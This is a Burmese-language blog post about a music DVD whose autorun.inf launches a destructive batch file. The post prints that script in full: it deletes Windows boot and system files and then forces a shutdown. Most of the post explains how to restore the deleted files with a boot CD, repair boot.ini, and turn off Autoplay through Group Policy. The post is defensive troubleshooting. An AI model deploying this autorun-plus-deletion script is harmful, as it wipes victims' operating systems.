Photobucket
ပင္မစာမ်က္နွာ


N .

Sunday 8 January 2012

Virus မဟုတ္ေသာ Windows ဖ်က္စီးေရးပရိုဂရမ္မ်ား

``လုပ္ပါဦးဗ်ာ ... အဲဒီ သီခ်င္းေခြထည့္လိုက္တာ ... စက္ပိတ္ သြားၿပီး ျပန္ဖြင့္ေတာ့ Windows ျပန္တက္မလာေတာ့ဘူးဗ်´´ ဆိုၿပီး အသိ တစ္ေယာက္ System Unit မလာၿပီး ေရာက္လာပါတယ္။ လက္ထဲမွာ လည္း DVD သီခ်င္းေခြေလး ပါလာပါတယ္။
``ကဲ ေပးစမ္းပါဦး...ခင္ဗ်ားေခြ´´ လို႔ ေျပာၿပီး ...ေခြယူကာ ကြၽန္ေတာ့္ကြန္ပ်ဴတာထဲ အရင္ထည့္ၾကည့္ လိုက္ပါတယ္။ ေခြထည့္လိုက္ တာနဲ႔ ျဖစ္သြားတာဆိုေတာ့ ေခြထဲမွာ Autorun File ပါလို႔ေပါ့။ ဒါေၾကာင့္ ကြၽန္ေတာ္လည္း Keyboard က Shift Key ေလးဖိထားၿပီး ေခြထည့္လိုက္ပါ တယ္။ DVD Drive မွ မီးေလးၿငိမ္းသြားမွ Shift Key ကိုလႊတ္လိုက္ပါတယ္။
ေခြထဲမွာ ဘာေတြပါလည္း ၾကည့္ၾကည့္လိုက္ဦးမယ္။ My Computer ကို ဖြင့္လိုက္ပါတယ္။ DVD Drive ကို Explorer View နဲ႔ ဖြင့္လိုက္ ပါတယ္။ Double Click နဲ႔ ဖြင့္လိုက္ရင္ ကြၽန္ေတာ့္စက္လည္း Windows ပ်က္သြားႏိုင္တယ္ေလ။ Autorun File ပြင့္မသြားေအာင္ Explorer နဲ႔ ဖြင့္တာပါ။ ေသခ်ာတာေပါ့ ကြၽန္ေတာ္ထင္တဲ့အတိုင္းပဲ Autorun File ေတြ႔ ပါၿပီဗ်ာ။ သီခ်င္း File ေတြနဲ႔အတူ ဖ်က္ဆီးေရး File ေတြ ပါလာပါတယ္။ ပါလာတဲ့ ဖ်က္ဆီးေရးဖိုင္ေတြကေတာ့ -
autorun.inf
EDCDPROT.ICO
PRO.BAT
PRO.EXE
VCD_PLAY.EXE
တို႔ ျဖစ္ပါတယ္။

ပထမဆံုး autorun.inf ဖိုင္ကို Notepad နဲ႔ ဖြင့္ၾကည့္လိုက္ပါတယ္။ ဘယ္ဖုိင္ေတြကို Run ထားတာလည္း ဆိုတာကုိ သိရေအာင္ပါ။ ကဲ ေတြ႔ပါၿပီဗ်ာ -
[Autorun]
ICON=EDCDPROT.ICO
OPEN=PRO.BAT
OPEN=PRO.EXE
OPEN=VCD_PLAY.exe
DVD ကို Icon ေလးေတာင္ ထည့္ထားလိုက္ေသးတယ္။ OPEN= PRO.BAT ဆိုေတာ့ PRO.BAT ကို အရင္ Run တာေပါ့။ BAT ဖိုင္ဆိုေတာ့ Notepad နဲ႔ ဖြင့္လို႔ရေသးတယ္ဗ်။ ဖြင့္လိုက္ပါၿပီဗ်ာ - ဟာဟ - ဟုတ္လွ ခ်ည္လား။
@echo off
attrib -a -s -r -h
cls
del c:\io.sys
del c:\msdos.sys
cls
del c:\windows\win.com
del c:\windows\win.ini
del c:\windows\system.ini
cls
del c:\winnt\winnt.*
cls
del/f/q/a -h c:\ntdetect.com
del/f/q/a -h c:\boot.ini
cls
shutdown -s -t 00
ေသခ်ာၿပီေပါ့။ ဘယ္လိုလုပ္ Windows တက္ႏုိင္မွာလဲ။ ဖ်က္ ထားတဲ့ ဖိုင္ေတြလည္း ၾကည့္ဦးေလ။ User က စက္မပိတ္မွာေၾကာက္လို႔။ ေနာက္ဆံုးစာေၾကာင္းမွာ Shutdown ေတာင္ အၿပီးလုပ္ေပး လိုက္ေသး တယ္။ က်န္တဲ့ဖိုင္ေတြေတာင္ မလိုေတာ့ပါဘူးဗ်ာ။ ဒီ(၂)ဖိုင္နဲ႔တင္ Windows က တက္မွာ မဟုတ္ေတာ့ဘူး။ က်န္တဲ့ဖိုင္ေတြကလည္း .EXE ဖိုင္ေတြဆိုေတာ့။ ဖြင့္ၾကည့္ဖို႔ခဲယဥ္းတယ္ေလ... ဒါေၾကာင့္ ဖြင့္မေန ေတာ့ပါဘူး။ ဒီေလာက္ဆို သေဘာေပါက္သြားၿပီ။
ကဲ...အဲဒီ Windows ကို ျပန္တက္လာေအာင္ ျပင္ၾကည့္ရ ေအာင္။ လြယ္ပါတယ္ သူဖ်က္ထားတဲ့ ဖိုင္ေတြကို တျခား Windows တူတဲ့ စက္ကေန ျပန္ကူးၿပီးေတာ့ထည့္ေပးလိုက္ေပါ့။ ဒါေပမယ့္ ေမးစရာေတာ့ ရွိတယ္ဗ်။ Windows မတက္ပါဘူးဆိုမွ ဘယ္လိုလုပ္ကူးထည့္ရမွာလဲ၊ ဟုတ္တာေပါ့...ဘယ္လိုကူးထည့္ရမလဲဆိုတာ ကြၽန္ေတာ္ေျပာျပမယ္ ေလ။ အဲဒီလုိ ကူးထည့္ဖို႔အတြက္ ကြၽန္ေတာ့္ရဲ႕ လက္ကိုင္တုတ္ျဖစ္တဲ့ Hiren Boot CD 9.3 ေတာ့ လိုတယ္ဗ်။ ေနာက္ၿပီး Memory Stick (Data Traveller/Flash Drive) ကေလးတစ္ခုလည္း လိုတယ္ဗ်။
အဆင့္(၁) Windows တက္ေနတဲ့စက္ထဲကေန Memory Stick ထဲကုိ သူဖ်က္လိုက္တဲ့ ဖုိင္ေတြကို ကူးထည့္ပါ။ ဖိုင္ေတြက System File ေတြဆိုေတာ့ Super hidden နဲ႔ ဖြက္ထားတာပါ။ အဲဒီဖိုင္ေတြကို ျမင္ရဖို႔ အတြက္ -
My Computer ကိုဖြင့္ပါ။ Drive C: ကိုဖြင့္ပါ။
Tools Menu မွ Folder Options ကို ေရြးပါ။
View Tab ကိုေရြးပါ။
Show hidden files and folders ကို ေရြးပါ။
Hide extens-ions for known file types နဲ႔ Hideprotected operating system files (Recommended)
Check Box ႏွစ္ခုကို Uncheck လုပ္ေပးပါ။
Yes/No ေမးပါလိမ့္မယ္။ Yes ကို ေရြးေပးပါ။
ၿပီးလွ်င္ OK ကို ႏွိပ္ပါ။
ဒါဆိုရင္ Drive C: ေအာက္မွာ ရွိတဲ့ Windows Operating System ဖိုင္ေတြကို ျမင္ရပါၿပီ။ အဲဒီထဲက IO.SYS, MSDOS.SYS, boot.ini, NTDETCT.COM ဖိုင္ေတြကို Memory Stick ထဲကို Copy ကူးထည့္ပါ။
ေနာက္ၿပီး C:\Windows\ ေအာက္ထဲမွာရွိတဲ့ system.ini, win.ini ဖိုင္ႏွစ္ဖိုင္ကိုလည္း Memory Stick ထဲကို Copy ကူးထည့္လိုက္ပါ။ သူ႔ PRO.BAT ဖိုင္ထဲမွာ ေရးထားတဲ့ Win.com ဖိုင္က ေနရာမွား ေနတာပါ။ တကယ္တမ္းရွိတာက C:\Windows\System32\ ေအာက္မွာပါ။ ဒါေပမယ့္ လိုရမယ္ရ C:\Windows\System32\win.com ကိုလည္း ကူးထည့္ထား လိုက္ပါ။
အဆင့္(၂) Windows ပ်က္ေနတဲ့စက္ကို Hiren Boot CD ျဖင့္ Boot တက္ခုိင္းပါ။
Windows XPE ကို ေရြး၍ CD ထဲမွ Mini Windows တက္ခိုင္းပါ။
Mini Windows တက္လာရင္ ခုနက ကူးထည့္ထားတဲ့ ဖိုင္ေတြပါတဲ့ Memory Stick ကို စက္ရဲ႕ USB Port မွာတပ္လိုက္ပါ။
My Computer ကိုဖြင့္ပါ။ Memory Stick Drive Icon ကိုဖြင့္ပါ။
ခုနက ကူးလာတဲ့ဖိုင္ေတြကိုေရြးၿပီး သူ႔ေနရာနဲ႔သူ လိုက္ၿပီးထည့္ပါ။
ရွိၿပီးသားဆိုရင္ေတာ့ overwrite မလုပ္ပါနဲ႔။
ဥပမာ - IO.SYS, MSDOS.SYS, boot.ini ဖုိင္ေတြကို C: ထဲကို Copy ကူးထည့္ပါ။
System.ini နဲ႔ win.ini ဖိုင္ေတြကို C:\Windows ေအာက္ထဲ ကူးထည့္ပါ။
ၿပီးရင္ Memory Stick ကို ျပန္ျဖဳတ္ပါ။ ဒါဆိုရင္ ၿပီးပါၿပီ။
Hiren Boot CD ေခြကိုထုတ္ၿပီး စက္ကို ျပန္ဖြင့္လိုက္ပါ။ ပံုမွန္အတိုင္း Windows ျပန္တက္လာပါလိမ့္မယ္။ ျပန္တက္မလာခဲ့ရင္ Boot Partition မွားေနလို႔ပါ။ ဒါဆိုရင္ Hiren Boot CD နဲ႔ Mini Windows ျပန္တက္ခိုင္းပါ။
ခုနက ကူးထည့္တဲ့ ဖိုင္ေတြထဲမွာ Boot Partition သတ္မွတ္ေပးတဲ့ ဖိုင္က boot.ini ဖိုင္ပါ။ သူ႔ကို ျပင္ဖို႔အတြက္ အဲဒီ boot.ini ဖိုင္ကို Notepad နဲ႔ ဖြင့္လိုက္ပါ။
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional”
/ noexecute=optin /fastdetect
အထက္ပါအတိုင္း ေပၚလာပါလိမ့္မယ္။ ဒါေတြကို ျပင္ဖို႔အတြက္ ကေတာ့ HardDisk နဲ႔ Partition အေၾကာင္းေတာ့ နဲနဲသိဖို႔လိုပါတယ္။
ကိုယ့္စက္ထဲမွာ HardDisk ကတစ္လံုးတည္းတပ္ထားရင္ေတာ့ သိပ္မခက္ပါဘူး။
ဥပမာ - Hard Disk ကို Partition (၂)ပိုင္း ပိုင္းထားတယ္ ဆိုပါေတာ့။ C: နဲ႔ D: ေပါ့ဗ်ာ။
ဒါဆိုရင္ C: ကို multi(0) disk(0) rdisk(0) partition(1) နဲ႔
D: ကို multi(0) disk(0) rdisk(0) partition(2)လို႔ သတ္မွတ္ပါတယ္။
(၃)ပိုင္း ပိုင္းထားရင္ partition(3)ေပါ့ဗ်ာ။ ကိုယ္က ဘယ္ partition ထဲမွာ Windows တင္ထားသလဲဆိုတာေတာ့ သိဖို႔လိုပါတယ္။ မ်ားေသာ အားျဖင့္ စက္ေတာ္ေတာ္မ်ားမ်ားကေတာ့ Hard Disk ကို Partition (၂)ပိုင္း ပိုင္းထားတတ္ၾကပါတယ္။ ၿပီးရင္ Windows ကိုလည္း C: ထဲမွာ တင္တာ မ်ားပါတယ္။ အဲဒီစက္မ်ားအတြက္ boot.ini မွာ ေအာက္ပါအတိုင္း ျဖစ္ရ ပါမယ္။
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional”
/ noexecute=optin /fastdetect
ဒါဆိုရင္ Boot Partition လည္း မွန္သြားၿပီဆိုေတာ့ Windows တက္ၿပီေပါ့။
ၿပီးရင္ ေနာက္တစ္ႀကိမ္ အဲဒီ သီခ်င္းေခြထည့္မိရင္ Windows ပ်က္ မသြားေအာင္ကာကြယ္ ထားၾကည့္ရေအာင္။ သူက autorun.inf နဲ႔ အလုပ္ လုပ္တာဆိုေတာ့ ထည့္သမွ် ေခြနဲ႔ တပ္သမွ် USB Device ေတြကို Group Policy ထဲ၀င္ၿပီး Autorun ပိတ္ထားလိုက္ရင္ရပါၿပီ။
အဲ - တစ္ခုေတာ့ သတိထားဗ်။ ေခြကေတာ့ Autorun မတက္ပါ ဘူး။ ကိုယ္ကိုယ္တိုင္ My Computer ထဲ၀င္ၿပီး ေခြကို Double Click ႏွိပ္ လိုက္လို႔ကေတာ့ ကိုယ့္ေခါင္းကိုယ္ တူနဲ႔ထုတာပဲ။ ဘာထူးလို႔လဲ ဘယ္ Drive မဆို Double Click ႏွိပ္လို႔ကေတာ့ အဲဒီ Drive ထဲမွာ Autorun ဖိုင္ ပါလို႔ကေတာ့ ထၿပီး Run မွာပဲေလ။ ဒါေလးေတာ့ သတိထားပါ။
ဒါေၾကာင့္ Virus ကိုက္တာမခံရခ်င္ရင္ ေတြ႕ကရာကို Double Click မႏွိပ္ပါနဲ႔။ မိမိ Folder ေတြ၊ Drive ေတြကိုလည္း Double Click မႏွိပ္ပါနဲ႔ Right Click ႏွိပ္ၿပီး Explorer နဲ႔ဖြင့္ပါ။ မိမိကိုယ္ကိုယ္မိမိ က်န္းမာေရးေကာင္း ေအာင္ ဆင္ဆင္ျခင္ျခင္ ေနထိုင္သလိုေပါ့ဗ်ာ။ ေတြ႕ကရာ ေလွ်ာက္စားေန မယ္ဆိုရင္ အနည္းဆံုးေတာ့ ၀မ္းပ်က္သလိုေပါ့။ ဒါေလးေတြကို ဆင္ျခင္ လိုက္ရင္ Virus ကိုက္ခံရတာ မရွိသေလာက္ နည္းသြားပါလိမ့္မယ္။
အဆင့္(၃) Autorun ပိတ္ၾကည့္ရေအာင္။ Run Box ကိုဖြင့္ပါ။ gpedit.msc ဟု ႐ိုက္ ထည့္ၿပီး Enter ႏွိပ္ပါ။
Group Policy Window ေပၚလာပါလိမ့္မယ္။ အဲဒီထဲမွ Administrative Templates ကိုဖြင့္ပါ။ System ကို ဆက္ဖြင့္ပါ။ ညာဘက္ Setting List ထဲမွ Turn off Autoplay ကုိ Double Click ႏွိပ္ပါ။ ေပၚလာ ေသာ Box ထဲမွ Enable ကိုေရြးပါ။ Turn off Autoplay on: Drop Down List Box ထဲမွ All Drives ကိုေရြးၿပီး OK ကိုႏွိပ္ပါ။ Group Policy ထဲမွ ထြက္လိုက္ပါ။ ဒါဆိုရင္ Autorun ဖိုင္ ပါတဲ့ မည္သည့္ေခြ မည္သည့္ Drive ကိုမဆို Auto Run မေပးေတာ့ပါဘူး။
ေနာက္တစ္နည္းက CPE17 Autorun Killer Program တင္ထားရင္ လည္း ရပါတယ္။ ကာကြယ္နည္းလည္း ၿပီးသြားပါၿပီ။ Windows လည္း ျပန္မတင္ ရေတာ့ဘူးေပါ့ဗ်ာ။

No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...